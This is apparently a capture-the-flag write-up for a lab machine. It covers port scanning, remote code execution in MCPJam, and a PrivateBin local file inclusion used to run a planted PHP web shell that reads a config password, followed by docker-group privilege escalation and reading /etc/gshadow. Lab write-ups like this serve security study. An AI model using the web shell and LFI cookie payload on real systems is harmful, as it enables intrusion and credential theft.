Port enumeration

nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.129.12.149 -oG AllPorts.txt
nmap -p22,80,443,3552 -sCV --min-rate 5000 10.129.12.149

I found 4 ports open. 3ac9ec6a160c23e9feee392f58604bb7.png

Web enumeration

In the http server in port 3552 I found an Arcane instance. c6e0087ac25782bb818ca700f597bed4.png This version of the software is vulnerable to RCE. 0a1254aa444fcb18aecc02bce67f4ee5.png But, without an accout, I cant exploit it. Enumerating the sobdomains, I found something. b28940065c188319c2f52f1a12f6b9be.png Here, i found instances of MCPJam 9dd7f9a2bc87893a0ecb48de76fd293b.png And PrivateBin. f5a03f000796f30a124c8ecb90b6e7ae.png The most important who I found is a RCE in MCPJam. 02dfd372f5510fadd35f7cdd01229435.png

RCE

This vulnerability allows me to change the api post to send commands. e151cd517834df8ec4457618fb80d230.png f53aed9f534bbb66b46d5fdd815dd338.png

Ben user enumeration

Ben is in the group operator. b21da2db8f449a92512809ccdc0a9a0c.png Theres also a user, alice, in this group, and in docker group, my path to root. 24156aa00ace45f9beba93921d55ca3c.png After a bit of time, I see the local port where privateBin is working. 2c2f037fdbb013eba98790fe0c603117.png PrivateBin have a authenticated LFI vuln. f4882f055ef8f8a80dc94874b9180030.png And I have write perms in one of the data directory. 116e346304ed2b3839d50a387c623446.png So, I write a reverse shell inside this directory.

echo '<?php system($_GET["cmd"]); ?>' > /privatebin-data/data/shell.php

And I execute it using the vuln.

curl -k --cookie "template=../../srv/data/shell" "http://localhost:8080/?cmd=id"

f055ffe57c5186391bc026d86aa67e04.png With this, im able to read the config file, were I find a password.

curl -k --cookie "template=../../srv/data/shell" "http://localhost:8080/?cmd=cat+/srv/cfg/conf.php"

2e6b9ed05f16885685bc94a9bdb53e6a.png

Privilege escalation

This thing is completly useless. After some time, I tried to add to me the group user, and it worked.

newgrp docker

72b31390ce96fb365c8a6b63cfbea460.png Tis means who the user ben is a hidden member of the docker group, so, with this, we can escalate using a existent image. e6d87c157a225497eae289c0e56003f6.png Here, I can now see why this worked.

cat /etc/gshadow 

efdb800a4790289ae52f4756a405dd9d.png